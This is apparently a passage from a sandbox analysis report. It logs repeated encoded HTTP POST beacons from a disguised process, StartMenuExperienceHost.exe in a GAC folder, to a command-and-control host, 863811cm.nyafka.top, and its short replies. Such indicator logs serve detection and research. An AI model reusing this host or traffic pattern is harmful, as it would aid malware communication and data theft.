                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuNI8sGzEb%2BCJOk3QvO9pFsqG%2BbblwjbxFQdnJQbJEyyLUCpRwLElsZRtmr8Hn01PPOMNPHQLujlXtdoAa7XvckmVIRjqUR72AezYpd5JBqIemD4WTfSvM37bVGRqit0pRfr8RP4"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fe87c28c448-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:14.628035069 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:14.723720074 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:14.723887920 CEST540OUTData Raw: 55 59 5d 55 51 58 58 52 5e 5a 55 58 51 54 5a 53 57 5d 58 5b 55 54 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY]UQXXR^ZUXQTZSW]X[UTQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?[?>:8&'?5^"+?X(36 P'>!S)+'""$^)#Y$/\*%
                                                                Oct 11, 2024 01:37:14.980346918 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBBCZ5zYTOVVSIt%2B1PVTug9lD%2BXGMKe94ef8n994hVQN1XnxP5Qj7YzWhCckgcPhp4AXeddESiCQW8PzLMG1ul%2FYTDJecPtpZNKChMCCT8%2FSPqDNzL5BVSU%2FL0xPiS1DhtPc3ExO"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6feabef0c448-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:14.980745077 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:15.096713066 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:15.096890926 CEST1984OUTData Raw: 55 5a 5d 5b 54 5d 58 55 5e 5a 55 58 51 53 5a 59 57 5c 58 5e 55 54 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UZ][T]XU^ZUXQSZYW\X^UTQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(<Y(:3S%'($"( )#S74'*+ 5"?)#Y$/\*9
                                                                Oct 11, 2024 01:37:15.402214050 CEST739INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CyMLycwHOq3Ig5cC%2Ba08nJqmHv4Q66tWMxjJyM78jdt91366DxbMCfK2omGBS9tIxXfsyx1x7sgm8u0OYBUdKsXEfgY%2FqVddJUyruJiXJsF0qnc5AeXvPIa7CDDpLgMX%2BQPZqHsN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fed0968c448-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 01 3d 29 00 1f 34 3e 05 5b 2f 0f 0e 5e 2a 03 00 16 2b 32 24 06 32 1d 2b 14 2e 3c 07 56 23 2b 28 17 2a 12 04 5b 33 3c 2b 1f 3f 31 2a 51 03 1b 3a 03 3c 30 34 09 2b 22 32 04 3c 21 2d 5c 30 1d 22 18 3e 3d 07 12 27 2e 2e 5f 22 21 37 0c 2a 5a 2c 0f 3b 5d 30 19 3e 16 0f 01 23 3b 2a 5f 08 13 39 1d 29 5e 3b 0d 22 19 29 5e 22 2d 1a 0c 22 2a 35 09 2a 39 3e 56 27 0a 3c 14 2f 32 06 12 37 01 23 1e 21 2c 0f 0b 20 5b 3c 1e 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a
                                                                Data Ascii: 98$=)4>[/^*+2$2+.<V#+(*[3<+?1*Q:<04+"2<!-\0">='.._"!7*Z,;]0>#;*_9)^;")^"-"*5*9>V'</27#!, [<&("_")Q?TR
                                                                Oct 11, 2024 01:37:15.530723095 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:37:15.600606918 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----ZOObBXvS4h1tKQkstlqP7QLI7LH1b425w1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3014
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:15.696588993 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:15.696751118 CEST3014OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 4f 4f 62 42 58 76 53 34 68 31 74 4b 51 6b 73 74 6c 71 50 37 51 4c 49 37 4c 48 31 62 34 32 35 77 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------ZOObBXvS4h1tKQkstlqP7QLI7LH1b425w1Content-Disposition: form-data; name="0"Content-Type: text/plainPS]ZT\XS^ZUXQ\Z_WQX\URQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:37:16.033489943 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcd%2Bxr2PzfhNdwYGC0zcFZo9fCMcs5Ke7FmKowv01cw3qUOSDO%2FSBAnMh5ZyQYoFtYmsOBE7jty7PsTMpzbNvOHAZRgDCBhNIbk6vfjxvbFlxsBqFD19WoitbS09sIAfxGmFc30K"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ff0cd4ec448-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:16.033894062 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:16.130111933 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:16.130283117 CEST2584OUTData Raw: 55 5d 5d 5f 54 5f 58 52 5e 5a 55 58 51 54 5a 5d 57 5b 58 5a 55 52 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]_T_XR^ZUXQTZ]W[XZURQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+-?:3&=,(0\6(<?%V Q$..>'!1>;#Y$/\*%
                                                                Oct 11, 2024 01:37:16.386368990 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ev6F1lqYbJKqbvf%2F1dPZq9FyFIDN1LnVzvS%2B6C14YlkvO%2Fei3Rpmq4SZMK7%2B3fixIRnn6tXyXNiplCE3OxbRbrW0bL30OLfLa%2FLPP6s7HS6pBZOVFMSyxNksfNrCIHwfyQdW6OuG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ff3881ac448-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                73192.168.2.550054188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:14.013930082 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:14.363207102 CEST2004OUTData Raw: 55 59 58 5d 51 5c 5d 53 5e 5a 55 58 51 57 5a 59 57 5e 58 5a 55 56 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UYX]Q\]S^ZUXQWZYW^XZUVQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(#+)8%>3(60_5$( 5T $0.)(,G 2#=#Y$/\*)
                                                                Oct 11, 2024 01:37:14.479382038 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:14.727463007 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LdzVnFzxrvuFTAtHeAjgK9oPpwoUU1IXCEUbkVB3zjsAK7PaU6AN%2BgpSvztV8ODdwfnhaLrMk2GrZ%2BNnld3z%2Fld2K4jkJTccAmh3FQay2x6voyb0MIULLkuVypLogSfbUA%2BYCilo"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fe92d931841-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 16 3d 29 00 55 34 07 2b 10 2f 21 0a 5e 2b 2d 25 00 29 21 3b 10 32 42 27 1a 2e 12 35 56 35 15 28 5f 29 12 3e 58 27 3c 33 5d 28 1b 2a 51 03 1b 39 11 28 55 37 1e 2b 32 29 5d 29 22 3e 04 24 0d 18 1a 3e 3d 07 1d 30 07 26 5e 35 0f 05 0b 29 2f 23 55 2c 02 2c 1c 3e 38 03 01 20 01 2a 5f 08 13 3a 0f 28 38 28 51 21 51 36 04 23 2d 3b 10 22 17 25 0e 3e 29 03 08 33 33 0e 15 2c 31 34 13 23 11 3f 55 23 2f 36 53 23 04 33 01 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'=)U4+/!^+-%)!;2B'.5V5(_)>X'<3](*Q9(U7+2)])">$>=0&^5)/#U,,>8 *_:(8(Q!Q6#-;"%>)33,14#?U#/6S#3%"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                74192.168.2.550055188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:14.755824089 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:15.113239050 CEST2584OUTData Raw: 50 5b 58 5f 54 54 58 56 5e 5a 55 58 51 54 5a 5d 57 5b 58 59 55 5c 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[X_TTXV^ZUXQTZ]W[XYU\QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?>((9'V%$< ^#++]+ 5 ?3-%V*8#"W?)#Y$/\*%
                                                                Oct 11, 2024 01:37:15.204046965 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:15.452141047 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogsQ4To9xoM3ywU5vmK2uw%2Bp%2BzuHlHdznUlMlHZ0vWC%2Bel%2Fcw7imALfyOK4tAfMHdX0DtCUP0UsTiVN8rSuBo0ahypsJMEgaKsEkOXm28KdXsKzY1yijm24JlpivRj55qmwJbL88"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fedbc814255-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                75192.168.2.550056188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:15.696662903 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:16.050628901 CEST2004OUTData Raw: 50 5e 5d 5e 54 5c 5d 56 5e 5a 55 58 51 50 5a 52 57 5e 58 5c 55 56 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]^T\]V^ZUXQPZRW^X\UVQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9<=(:/W%=??7!3(3! $($-%(8 513>#Y$/\*5
                                                                Oct 11, 2024 01:37:16.230042934 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:16.479624033 CEST740INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:16 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X0SqB6HWOrAQOtURt9YJA9wOtbM316OcJe3lGFxMik9101U7n1lhjLaTjB0bhLVkNLkndiNHgkas7vawPd%2FchFHsVQlngkgXxkGI26y39CeO59EnzFMY3XHunSZNiOwT2S0XwfJQ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ff41f6341e9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 3e 3a 3d 0c 23 58 23 58 38 0f 3b 01 2b 2e 2e 59 28 21 2f 12 32 24 19 15 2e 05 22 0d 23 38 28 17 29 2c 35 06 27 3f 2b 12 3f 1b 2a 51 03 1b 39 59 3f 0d 27 1d 29 31 32 04 28 0c 0f 5c 26 23 36 1d 2a 13 35 56 27 3d 39 04 21 31 28 56 3e 02 02 0f 2d 3b 20 1a 2a 5e 31 02 20 01 2a 5f 08 13 39 51 3d 3b 3f 0d 22 51 29 59 21 13 16 0b 22 17 2e 53 3e 39 21 0e 30 33 30 5c 2c 0c 24 5a 23 3c 30 0f 36 02 3e 52 23 04 33 02 26 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>:=#X#X8;+..Y(!/2$."#8(),5'?+?*Q9Y?')12(\&#6*5V'=9!1(V>-; *^1 *_9Q=;?"Q)Y!".S>9!030\,$Z#<06>R#3&("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                76192.168.2.550057188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:16.504198074 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:16.862927914 CEST2584OUTData Raw: 55 59 5d 58 51 59 58 50 5e 5a 55 58 51 56 5a 5e 57 5d 58 5b 55 5d 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY]XQYXP^ZUXQVZ^W]X[U]Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?<\;V2>0E(5Y6;) 9#$ 31>84A62,[>#Y$/\*-
                                                                Oct 11, 2024 01:37:16.968772888 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:17.224406958 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:17.224456072 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FoFMDz%2FliDTXUvTzrO2dP7T9TbacKAtyIF%2FUTSHCKEP6LfUmTn2VY7osSNyOQ7hdDF62sDF%2BN1b5T8cFLidJ5QGCqpHe2ukrpCqAyY2J4lDx0QV7D3YBcXbezQEnuNjOUALQq3W"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ff8bb1343af-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                77192.168.2.550058188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:16.588973999 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:16.941160917 CEST2004OUTData Raw: 55 5a 5d 55 54 59 5d 51 5e 5a 55 58 51 54 5a 5e 57 51 58 58 55 51 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UZ]UTY]Q^ZUXQTZ^WQXXUQQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<-4\(9'2=#+"<+U9W##$9R*+6(+#Y$/\*%
                                                                Oct 11, 2024 01:37:17.224330902 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:17.224467039 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ppuRqXxGOJsM4%2FVX4%2FlbAdT7W9f0LQ7mZjrbGmXvGOxtxiDpuEYGsq1c1cmoIRea1lmDeg2ZcUaU9j%2FX097KQjAoREikaW1P%2FmjbEPPawMtzPUfv7S59afqP9HTxDzcck5LedVG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6ff93ff9427c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 3e 17 00 53 34 00 0d 12 2c 0f 20 5a 2a 03 00 5e 2b 22 2f 5f 32 0a 20 04 2e 5a 36 0f 35 3b 2f 00 29 05 32 5b 33 02 3b 5b 29 31 2a 51 03 1b 39 59 28 55 2c 0e 28 22 39 5f 3f 32 21 14 30 0d 31 08 3e 2d 25 57 24 10 3a 15 23 31 24 53 3e 05 2f 1e 2f 28 2b 43 28 38 00 5d 20 01 2a 5f 08 13 3a 08 28 38 09 0e 36 34 21 5f 22 03 23 54 35 2a 25 0e 3d 17 29 09 24 0d 28 14 2c 22 2b 00 34 06 37 1d 22 2c 36 55 34 2d 06 10 31 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\>S4, Z*^+"/_2 .Z65;/)2[3;[)1*Q9Y(U,("9_?2!01>-%W$:#1$S>//(+C(8] *_:(864!_"#T5*%=)$(,"+47",6U4-18"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                78192.168.2.550059188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:17.338349104 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:17.691155910 CEST2004OUTData Raw: 50 58 58 5e 54 5b 5d 51 5e 5a 55 58 51 53 5a 5b 57 5f 58 59 55 53 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
